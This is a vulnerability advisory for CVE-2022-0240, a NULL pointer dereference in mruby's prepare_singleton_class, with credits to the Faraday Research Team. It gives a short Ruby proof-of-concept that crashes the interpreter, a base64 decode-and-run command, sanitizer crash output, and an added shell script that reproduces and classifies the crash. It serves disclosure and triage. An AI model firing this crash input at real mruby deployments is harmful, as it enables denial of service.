Headline
CVE-2022-0240: NULL Pointer Dereference in mruby
mruby is vulnerable to a NULL pointer dereference in prepare_singleton_class (src/class.c).
Description
There is a NULL pointer dereference in prepare_singleton_class (src/class.c:360:13). The PoC reaches it from mrb_vm_exec through mrb_singleton_class and mrb_singleton_class_ptr when it defines the singleton method c.e: prepare_singleton_class reads a member of a struct RClass through a NULL pointer, which the sanitizer output below reports first as undefined behaviour (UBSan) and then as a SEGV on address 0x10, i.e. a read in the zero page (ASan). The bug was found on the latest mruby commit at the time of reporting (hash 171d32c0071d776207174a40a8fa26def3dbb931) on Ubuntu 20.04 for x86_64/amd64.
Proof of Concept
1.times{b={}
a=0
[**0,m:0]
c={0=>0,nil=>nil}[0]
def m()end
def c.e()end}
Steps to reproduce
1- Clone the repository and build it with the bundled sanitizer configuration (ASan plus UBSan, as the output below shows): MRUBY_CONFIG=build_config/clang-asan.rb rake
2- Write the PoC to a file and execute it with the freshly built mruby binary:
$ echo -ne "MS50aW1lc3tiPXt9CmE9MApbKiowLG06MF0KYz17MD0+MCxuaWw9Pm5pbH1bMF0KZGVmIG0oKWVuZApkZWYgYy5lKCllbmR9Cg==" | base64 -d > poc
$ build/host/bin/mruby ./poc
/home/octa/mruby/src/class.c:360:13: runtime error: member access within null pointer of type 'struct RClass'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/octa/mruby/src/class.c:360:13 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==31695==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000005270f8 bp 0x7ffec6a14090 sp 0x7ffec6a13d80 T0)
==31695==The signal is caused by a READ memory access.
==31695==Hint: address points to the zero page.
#0 0x5270f8 in prepare_singleton_class /home/octa/mruby/src/class.c:360:13
#1 0x52688f in mrb_singleton_class_ptr /home/octa/mruby/src/class.c:1685:3
#2 0x528785 in mrb_singleton_class /home/octa/mruby/src/class.c:1692:22
#3 0x600757 in mrb_vm_exec /home/octa/mruby/src/vm.c:2918:17
#4 0x566ee9 in mrb_vm_run /home/octa/mruby/src/vm.c:1128:12
#5 0x55c339 in mrb_top_run /home/octa/mruby/src/vm.c:3050:12
#6 0x88b6ce in mrb_load_exec /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6882:7
#7 0x88d2dc in mrb_load_detect_file_cxt /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6925:12
#8 0x4c9118 in main /home/octa/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347:11
#9 0x7f46ef9450b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#10 0x41d82d in _start (/home/octa/mruby/build/host/bin/mruby+0x41d82d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/octa/mruby/src/class.c:360:13 in prepare_singleton_class
==31695==ABORTING
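The following script automates the two reproduction steps and adds the check a triager wants afterwards: it decodes the PoC exactly as in step 2, builds the reported commit with the sanitizer configuration, and classifies the resulting sanitizer report as a NULL dereference (ASan faulting address in the zero page, or a UBSan null member access) rather than some other wild-pointer SEGV. This is an added example, not code from the report or from the mruby project. It assumes the upstream repository URL https://github.com/mruby/mruby (not stated in the report) and that git, rake, clang, base64, grep and sed are on PATH; only repro_build needs the network, the other functions run offline on a captured report.

```shell
#!/bin/sh
# Added reproduction and triage helper for the mruby crash described above.
# Not part of the original report or of mruby. Assumptions: upstream repo URL
# https://github.com/mruby/mruby (not given on the page); git, rake, clang,
# base64, grep and sed available. Only repro_build needs network access.
set -eu

# The PoC from the report, base64-encoded exactly as in step 2.
POC_B64='MS50aW1lc3tiPXt9CmE9MApbKiowLG06MF0KYz17MD0+MCxuaWw9Pm5pbH1bMF0KZGVmIG0oKWVuZApkZWYgYy5lKCllbmR9Cg=='

# Decode the PoC into the file given as $1.
write_poc() {
    printf '%s' "$POC_B64" | base64 -d > "$1"
}

# Clone the exact commit named in the report and build it with the sanitizer
# configuration from step 1. Directory defaults to ./mruby.
repro_build() {
    dir=${1:-mruby}
    git clone https://github.com/mruby/mruby "$dir"
    git -C "$dir" checkout 171d32c0071d776207174a40a8fa26def3dbb931
    (cd "$dir" && MRUBY_CONFIG=build_config/clang-asan.rb rake)
}

# Classify a sanitizer report read from stdin and print one word:
#   null-deref  ASan SEGV with the faulting address in the zero page, or a
#               UBSan "member access within null pointer" report
#   segv        ASan SEGV at some other address (worth a closer look, since
#               a controlled non-null address is a different bug class)
#   none        no ASan SEGV in the report
# Returns 1 when nothing crashed so the function can gate a CI job.
classify_crash() {
    report=$(cat)
    if ! printf '%s\n' "$report" | grep -q 'ERROR: AddressSanitizer: SEGV'; then
        echo none
        return 1
    fi
    if printf '%s\n' "$report" | grep -q -e 'address points to the zero page' \
                                          -e 'member access within null pointer'; then
        echo null-deref
    else
        echo segv
    fi
}

# Name of the crashing function, taken from the ASan SUMMARY line
# (e.g. "prepare_singleton_class"); prints nothing if there is no summary.
crash_function() {
    sed -n 's/^SUMMARY: AddressSanitizer: SEGV .* in \(.*\)$/\1/p' | head -n 1
}

# Full run: build, execute the PoC, classify. Guarded by the "run" argument so
# that sourcing the file for its functions never starts a clone or a build.
if [ "${1:-}" = run ]; then
    repro_build mruby
    write_poc poc
    out=$(./mruby/build/host/bin/mruby ./poc 2>&1 || true)
    printf '%s\n' "$out"
    printf 'crash class: %s in %s\n' \
        "$(printf '%s\n' "$out" | classify_crash || true)" \
        "$(printf '%s\n' "$out" | crash_function)"
fi
```

Invoke as `sh repro.sh run` to perform the whole reproduction; source the file instead (`. ./repro.sh`) to reuse classify_crash and crash_function on reports saved from other fuzzing runs. The zero-page heuristic mirrors ASan's own "Hint: address points to the zero page" message, so a crash that ASan itself attributes to a small offset from NULL is separated from SEGVs at arbitrary addresses, which deserve manual exploitability review rather than a plain NULL-dereference label.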
Acknowledgements
This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.